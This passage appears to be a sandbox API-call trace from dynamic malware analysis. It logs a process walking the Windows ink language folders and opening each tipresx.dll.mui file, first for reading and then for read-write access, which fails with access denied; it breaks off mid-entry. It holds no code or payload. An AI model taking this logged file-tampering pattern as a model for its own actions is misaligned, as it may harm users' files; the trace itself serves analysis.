[0100.560] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0100.560] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0100.560] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0100.560] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.560] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e718 [0100.560] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.560] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x4ebc8 [0100.560] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e718 | out: hHeap=0x20000) returned 1 [0100.560] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.560] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c650 [0100.560] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0100.560] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.560] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.560] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.560] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.560] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c650 | out: hHeap=0x20000) returned 1 [0100.560] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.560] AreFileApisANSI () returned 1 [0100.560] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\nb-NO\\tipresx.dll.mui", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\nb-NO\\tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 73 [0100.560] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d790 [0100.560] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.560] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.560] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0100.560] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0100.560] AreFileApisANSI () returned 1 [0100.561] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d790, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0100.561] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85120 [0100.561] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d790, cbMultiByte=-1, lpWideCharStr=0x85120, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\nb-NO\\tipresx.dll.mui") returned 73 [0100.561] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\nb-NO\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\nb-no\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0100.561] GetFileType (hFile=0x27c) returned 0x1 [0100.561] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85120 | out: hHeap=0x20000) returned 1 [0100.561] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0100.561] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0100.562] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0100.562] CloseHandle (hObject=0x27c) returned 1 [0100.562] AreFileApisANSI () returned 1 [0100.562] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d790, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0100.562] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x858a0 [0100.562] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d790, cbMultiByte=-1, lpWideCharStr=0x858a0, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\nb-NO\\tipresx.dll.mui") returned 73 [0100.563] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\nb-NO\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\nb-no\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0100.563] GetLastError () returned 0x5 [0100.563] GetLastError () returned 0x5 [0100.563] SetLastError (dwErrCode=0x5) [0100.563] GetLastError () returned 0x5 [0100.563] SetLastError (dwErrCode=0x5) [0100.563] GetLastError () returned 0x5 [0100.563] SetLastError (dwErrCode=0x5) [0100.563] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x858a0 | out: hHeap=0x20000) returned 1 [0100.563] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0100.563] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0100.563] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d790 | out: hHeap=0x20000) returned 1 [0100.563] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.563] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.563] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x327f510, ftCreationTime.dwHighDateTime=0x90, ftLastAccessTime.dwLowDateTime=0x327f498, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x8c700, ftLastWriteTime.dwHighDateTime=0x327f288, nFileSizeHigh=0x90, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="t ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ蘿̧⠀")) returned 0 [0100.563] FindClose (in: hFindFile=0x78150 | out: hFindFile=0x78150) returned 1 [0100.563] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0100.563] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35030 [0100.563] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0100.563] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35030 | out: hHeap=0x20000) returned 1 [0100.563] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e3e8 | out: hHeap=0x20000) returned 1 [0100.563] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.563] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e140 | out: hHeap=0x20000) returned 1 [0100.563] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0100.564] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0100.564] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46128 | out: hHeap=0x20000) returned 1 [0100.564] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0100.564] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0100.564] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0100.564] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0100.564] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0100.564] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35110 [0100.564] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0100.564] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35110 | out: hHeap=0x20000) returned 1 [0100.564] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0100.564] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5fd18 [0100.564] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0100.564] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6eb58 [0100.564] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fd18 | out: hHeap=0x20000) returned 1 [0100.564] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.564] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.564] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.564] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.564] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6eb58 | out: hHeap=0x20000) returned 1 [0100.564] AreFileApisANSI () returned 1 [0100.564] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\nl-NL", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\nl-NL", lpUsedDefaultChar=0x0) returned 57 [0100.564] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53520 [0100.564] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.564] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.564] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0100.564] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0100.565] AreFileApisANSI () returned 1 [0100.565] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0100.565] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a3b0 [0100.565] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x6a3b0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\nl-NL") returned 57 [0100.565] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\nl-NL" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\nl-nl"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0100.565] GetLastError () returned 0x5 [0100.565] GetLastError () returned 0x5 [0100.565] SetLastError (dwErrCode=0x5) [0100.565] GetLastError () returned 0x5 [0100.565] SetLastError (dwErrCode=0x5) [0100.565] GetLastError () returned 0x5 [0100.565] SetLastError (dwErrCode=0x5) [0100.565] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0100.565] AreFileApisANSI () returned 1 [0100.565] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0100.565] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a9b0 [0100.565] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x6a9b0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\nl-NL") returned 57 [0100.566] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\nl-NL" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\nl-nl"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0100.566] GetLastError () returned 0x5 [0100.566] GetLastError () returned 0x5 [0100.566] SetLastError (dwErrCode=0x5) [0100.566] GetLastError () returned 0x5 [0100.566] SetLastError (dwErrCode=0x5) [0100.566] GetLastError () returned 0x5 [0100.566] SetLastError (dwErrCode=0x5) [0100.566] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a9b0 | out: hHeap=0x20000) returned 1 [0100.566] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0100.566] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0100.566] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53520 | out: hHeap=0x20000) returned 1 [0100.566] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.566] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.566] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.566] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.566] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76098 [0100.566] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f798 [0100.566] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76098 | out: hHeap=0x20000) returned 1 [0100.566] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ec68 [0100.566] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f798 | out: hHeap=0x20000) returned 1 [0100.566] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa080d57c, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3c699c, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="pl-PL", cAlternateFileName="")) returned 1 [0100.566] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0100.566] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0100.566] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e470 [0100.566] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6eb58 [0100.566] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\nl-NL\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x78190 [0100.567] FindNextFileW (in: hFindFile=0x78190, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa076c75d, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3c699c, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0100.567] FindNextFileW (in: hFindFile=0x78190, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e933091, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e933091, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e933091, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2800, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0100.567] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6eb58 | out: hHeap=0x20000) returned 1 [0100.567] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.567] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0100.567] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.567] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.567] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.567] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0100.567] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.567] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.567] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.567] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e3e8 [0100.567] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x467b8 [0100.567] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ec68 | out: hHeap=0x20000) returned 1 [0100.567] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0100.567] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35030 [0100.567] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0100.567] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35030 | out: hHeap=0x20000) returned 1 [0100.567] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0100.567] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350b0 [0100.567] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0100.567] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350b0 | out: hHeap=0x20000) returned 1 [0100.567] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.567] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0100.567] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.567] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x4ebc8 [0100.567] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0100.567] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.568] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8cce0 [0100.568] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0100.568] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.568] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.568] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.568] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.568] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8cce0 | out: hHeap=0x20000) returned 1 [0100.568] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.568] AreFileApisANSI () returned 1 [0100.568] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\nl-NL\\tipresx.dll.mui", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\nl-NL\\tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 73 [0100.568] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d580 [0100.568] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.568] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.568] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0100.568] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0100.568] AreFileApisANSI () returned 1 [0100.568] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d580, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0100.568] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85d00 [0100.568] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d580, cbMultiByte=-1, lpWideCharStr=0x85d00, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\nl-NL\\tipresx.dll.mui") returned 73 [0100.569] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\nl-NL\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\nl-nl\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0100.569] GetFileType (hFile=0x27c) returned 0x1 [0100.569] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85d00 | out: hHeap=0x20000) returned 1 [0100.569] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0100.569] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0100.569] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0100.570] CloseHandle (hObject=0x27c) returned 1 [0100.570] AreFileApisANSI () returned 1 [0100.570] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d580, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0100.570] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x858a0 [0100.570] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d580, cbMultiByte=-1, lpWideCharStr=0x858a0, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\nl-NL\\tipresx.dll.mui") returned 73 [0100.570] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\nl-NL\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\nl-nl\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0100.570] GetLastError () returned 0x5 [0100.570] GetLastError () returned 0x5 [0100.570] SetLastError (dwErrCode=0x5) [0100.570] GetLastError () returned 0x5 [0100.570] SetLastError (dwErrCode=0x5) [0100.570] GetLastError () returned 0x5 [0100.570] SetLastError (dwErrCode=0x5) [0100.571] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x858a0 | out: hHeap=0x20000) returned 1 [0100.571] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0100.571] HeapFree (in: 